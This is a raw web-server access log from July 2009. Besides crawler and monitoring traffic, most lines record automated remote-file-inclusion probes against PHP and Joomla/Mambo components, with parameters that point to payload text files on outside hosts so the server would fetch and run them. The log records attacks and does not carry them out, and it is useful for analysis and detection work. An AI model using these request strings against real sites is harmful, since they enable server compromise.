66.249.68.247 - - [12/Jul/2009:06:32:52 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1193984193139000BAB1053+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.234.63.107 - - [12/Jul/2009:06:33:02 -0400] "GET /logs/access_log.Q109052100%20%20//cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:06:33:06 -0400] "GET /logs/access_log.Q109053000%20%20//cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:06:33:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [12/Jul/2009:06:33:57 -0400] "GET /logs/error_log.Q108110800 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.105.230 - - [12/Jul/2009:06:34:05 -0400] "GET /logs/error_log.Q108122300 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.236.242.164 - - [12/Jul/2009:06:34:53 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:35:21 -0400] "GET /logs/access_log.Q109061500%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:36:29 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
66.249.68.247 - - [12/Jul/2009:06:36:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
211.236.242.164 - - [12/Jul/2009:06:36:39 -0400] "GET //config/dbutil.bck.php?confdir=http://jst.or.th/index1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:36:40 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://jst.or.th/index1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:36:40 -0400] "GET /logs/access_log.Q109070300%20%20//config/dbutil.bck.php?confdir=http://jst.or.th/index1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:37:11 -0400] "GET /logs/access_log.Q109061500%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.169.210.130 - - [12/Jul/2009:06:37:19 -0400] "GET /logs/access_log.Q109052700/index.php?option=com_events&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
217.169.210.130 - - [12/Jul/2009:06:37:20 -0400] "GET /index.php?option=com_events&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.76"
217.169.210.130 - - [12/Jul/2009:06:37:20 -0400] "GET /logs/index.php?option=com_events&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.76"
209.59.12.99 - - [12/Jul/2009:06:39:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.150.78.241 - - [12/Jul/2009:06:41:49 -0400] "GET /logs/access_log.Q109062800///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.150.78.241 - - [12/Jul/2009:06:41:49 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
218.150.78.241 - - [12/Jul/2009:06:41:49 -0400] "GET /logs/access_log.Q109050900///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.150.78.241 - - [12/Jul/2009:06:41:49 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9196 "-" "Mozilla/5.0"
62.16.115.69 - - [12/Jul/2009:06:42:04 -0400] "GET //?sIncPath=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
62.16.115.69 - - [12/Jul/2009:06:42:04 -0400] "GET /logs/access_log.Q109070300//?sIncPath=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.16.115.69 - - [12/Jul/2009:06:42:04 -0400] "GET /logs//?sIncPath=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 200 9195 "-" "Mozilla/5.0"
65.55.105.230 - - [12/Jul/2009:06:42:07 -0400] "GET /logs/access_log.Q107081300 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.68.70 - - [12/Jul/2009:06:42:15 -0400] "GET /images/items/0034099_thumb.jpg HTTP/1.1" 200 1538 "-" "Googlebot-Image/1.0"
62.16.115.69 - - [12/Jul/2009:06:42:36 -0400] "GET /logs/access_log.Q109070300%20%20//?sIncPath=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
79.148.238.69 - - [12/Jul/2009:06:42:51 -0400] "GET /logs/access_log.Q109052700/index.php?option=com_events&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
79.148.238.69 - - [12/Jul/2009:06:42:52 -0400] "GET /index.php?option=com_events&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
79.148.238.69 - - [12/Jul/2009:06:42:53 -0400] "GET /logs/index.php?option=com_events&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
218.27.203.107 - - [12/Jul/2009:06:43:46 -0400] "GET /logs/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:06:43:46 -0400] "GET /send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:06:43:46 -0400] "GET /logs/access_log.Q109070300/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.16.115.69 - - [12/Jul/2009:06:44:17 -0400] "GET /logs/access_log.Q109062200%20%20//?sIncPath=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:06:44:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.63.91.170 - - [12/Jul/2009:06:45:13 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:06:45:13 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:06:45:15 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
140.117.120.161 - - [12/Jul/2009:06:45:27 -0400] "GET /logs/access_log.Q109061300//login.php?dir= HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:06:45:27 -0400] "GET /logs//login.php?dir= HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:06:45:27 -0400] "GET //login.php?dir= HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
218.27.203.107 - - [12/Jul/2009:06:45:48 -0400] "GET /logs////components/com_performs/performs.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:06:45:48 -0400] "GET /logs/access_log.Q109050900////components/com_performs/performs.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
140.117.120.161 - - [12/Jul/2009:06:45:57 -0400] "GET /logs/access_log.Q109061700//login.php?dir= HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
147.123.157.1 - - [12/Jul/2009:06:46:47 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:06:46:47 -0400] "GET //index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:06:46:47 -0400] "GET /logs/access_log.Q109051400%20%20//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:06:46:57 -0400] "GET /logs/error_log.Q109051400%20%20//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.169.210.130 - - [12/Jul/2009:06:47:15 -0400] "GET /logs/access_log.Q109051200/index.php?option=com_facileforms&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
217.169.210.130 - - [12/Jul/2009:06:47:15 -0400] "GET /index.php?option=com_facileforms&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.76"
217.169.210.130 - - [12/Jul/2009:06:47:16 -0400] "GET /logs/index.php?option=com_facileforms&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.76"
209.51.133.202 - - [12/Jul/2009:06:47:20 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:06:47:20 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:06:47:20 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
79.148.238.69 - - [12/Jul/2009:06:47:28 -0400] "GET /logs/access_log.Q109060500/index.php?option=com_events&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
79.148.238.69 - - [12/Jul/2009:06:47:28 -0400] "GET /index.php?option=com_events&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
79.148.238.69 - - [12/Jul/2009:06:47:29 -0400] "GET /logs/index.php?option=com_events&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
209.51.133.202 - - [12/Jul/2009:06:47:41 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:06:48:08 -0400] "GET /logs/access_log.Q109060600/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:06:49:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.51.133.202 - - [12/Jul/2009:06:49:47 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:06:49:51 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:06:50:14 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:06:50:22 -0400] "GET /logs/access_log.Q109061700//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:06:50:55 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:06:50:57 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.15.48.60 - - [12/Jul/2009:06:51:13 -0400] "GET /logs/access_log.Q109070800/?mosConfig_admin_path=http://www.gornik-klodawa.pl/media/id.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
67.15.48.60 - - [12/Jul/2009:06:51:13 -0400] "GET /?mosConfig_admin_path=http://www.gornik-klodawa.pl/media/id.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
67.15.48.60 - - [12/Jul/2009:06:51:13 -0400] "GET /logs/?mosConfig_admin_path=http://www.gornik-klodawa.pl/media/id.txt? HTTP/1.1" 200 9190 "-" "libwww-perl/5.810"
217.169.210.130 - - [12/Jul/2009:06:51:46 -0400] "GET /logs/access_log.Q109061200/index.php?option=com_facileforms&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
62.16.115.69 - - [12/Jul/2009:06:52:13 -0400] "GET /logs/access_log.Q109062200//?sIncPath=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.15.48.60 - - [12/Jul/2009:06:52:16 -0400] "GET /logs/access_log.Q109070400/?mosConfig_admin_path=http://www.gornik-klodawa.pl/media/id.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
218.27.203.107 - - [12/Jul/2009:06:52:18 -0400] "GET /logs/access_log.Q109062700////components/com_performs/performs.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
213.171.225.234 - - [12/Jul/2009:06:53:00 -0400] "GET /logs/error_log.Q109060700//index.php?pagina=http://83.3.132.70/iGeoMap/www//tmp/pit-id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
213.171.225.234 - - [12/Jul/2009:06:53:01 -0400] "GET //index.php?pagina=http://83.3.132.70/iGeoMap/www//tmp/pit-id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
213.171.225.234 - - [12/Jul/2009:06:53:01 -0400] "GET /logs//index.php?pagina=http://83.3.132.70/iGeoMap/www//tmp/pit-id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
67.15.48.60 - - [12/Jul/2009:06:53:12 -0400] "GET /?mosConfig_admin_path=http://www.gornik-klodawa.pl/media/id.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
147.123.157.1 - - [12/Jul/2009:06:53:28 -0400] "GET //modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:06:53:29 -0400] "GET /logs//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:06:53:29 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:06:53:33 -0400] "GET /logs/access_log.Q109062100//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
79.148.238.69 - - [12/Jul/2009:06:53:49 -0400] "GET /logs/access_log.Q109051200/index.php?option=com_facileforms&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
79.148.238.69 - - [12/Jul/2009:06:53:50 -0400] "GET /index.php?option=com_facileforms&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
79.148.238.69 - - [12/Jul/2009:06:53:51 -0400] "GET /logs/index.php?option=com_facileforms&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
74.63.91.170 - - [12/Jul/2009:06:54:12 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:06:54:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
140.117.120.161 - - [12/Jul/2009:06:55:14 -0400] "GET /logs//?path%5Bdocroot%5D= HTTP/1.1" 200 9195 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:06:55:14 -0400] "GET //?path%5Bdocroot%5D= HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:06:55:16 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D= HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:06:55:17 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D= HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
211.245.23.158 - - [12/Jul/2009:06:55:25 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:06:55:25 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:06:55:25 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:06:55:31 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:06:55:40 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:06:55:41 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:06:55:41 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:06:55:59 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
213.171.225.234 - - [12/Jul/2009:06:56:06 -0400] "GET /logs/access_log.Q109061100//index.php?pagina=http://83.3.132.70/iGeoMap/www//tmp/pit-id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
79.148.238.69 - - [12/Jul/2009:06:57:51 -0400] "GET /logs/access_log.Q109061200/index.php?option=com_facileforms&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/Jul/2009:06:59:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.177 - - [12/Jul/2009:06:59:57 -0400] "GET /logs/error_log.Q109070600 HTTP/1.0" 200 2489995 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.177 - - [12/Jul/2009:06:59:57 -0400] "GET /logs/error_log.Q109070600 HTTP/1.0" 200 2489995 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.247 - - [12/Jul/2009:07:01:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1193984193635000BBB1053+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
24.93.140.20 - - [12/Jul/2009:07:01:51 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSN Optimized;US)"
24.93.140.20 - - [12/Jul/2009:07:01:51 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSN Optimized;US)"
24.93.140.20 - - [12/Jul/2009:07:01:51 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSN Optimized;US)"
24.93.140.20 - - [12/Jul/2009:07:01:51 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSN Optimized;US)"
140.117.120.161 - - [12/Jul/2009:07:02:08 -0400] "GET /solpot.html?body=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:07:02:08 -0400] "GET /logs/solpot.html?body=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:07:02:08 -0400] "GET /logs/error_log.Q109062000/solpot.html?body=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:07:02:08 -0400] "GET /logs/error_log.Q109061400/solpot.html?body=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
218.27.203.107 - - [12/Jul/2009:07:03:06 -0400] "GET /logs/access_log.Q109060400///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:07:03:06 -0400] "GET ///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:07:03:06 -0400] "GET /logs///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
193.254.241.12 - - [12/Jul/2009:07:03:29 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
193.254.241.12 - - [12/Jul/2009:07:03:30 -0400] "GET /logs/access_log.Q109062800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
193.254.241.12 - - [12/Jul/2009:07:03:31 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
99.48.215.104 - - [12/Jul/2009:07:03:49 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows XP 5.1; MSIE 7.0.5730.13)"
99.48.215.104 - - [12/Jul/2009:07:03:49 -0400] "GET /favicon.gif HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows XP 5.1; MSIE 7.0.5730.13)"
99.48.215.104 - - [12/Jul/2009:07:03:49 -0400] "GET /CGI-BIN/favicon.ico HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows XP 5.1; MSIE 7.0.5730.13)"
99.48.215.104 - - [12/Jul/2009:07:03:49 -0400] "GET /CGI-BIN/favicon.gif HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows XP 5.1; MSIE 7.0.5730.13)"
209.59.12.99 - - [12/Jul/2009:07:04:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.27.203.107 - - [12/Jul/2009:07:06:36 -0400] "GET /logs///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:07:06:36 -0400] "GET /logs/access_log.Q109052700///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:07:06:36 -0400] "GET /logs/access_log.Q109052300///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
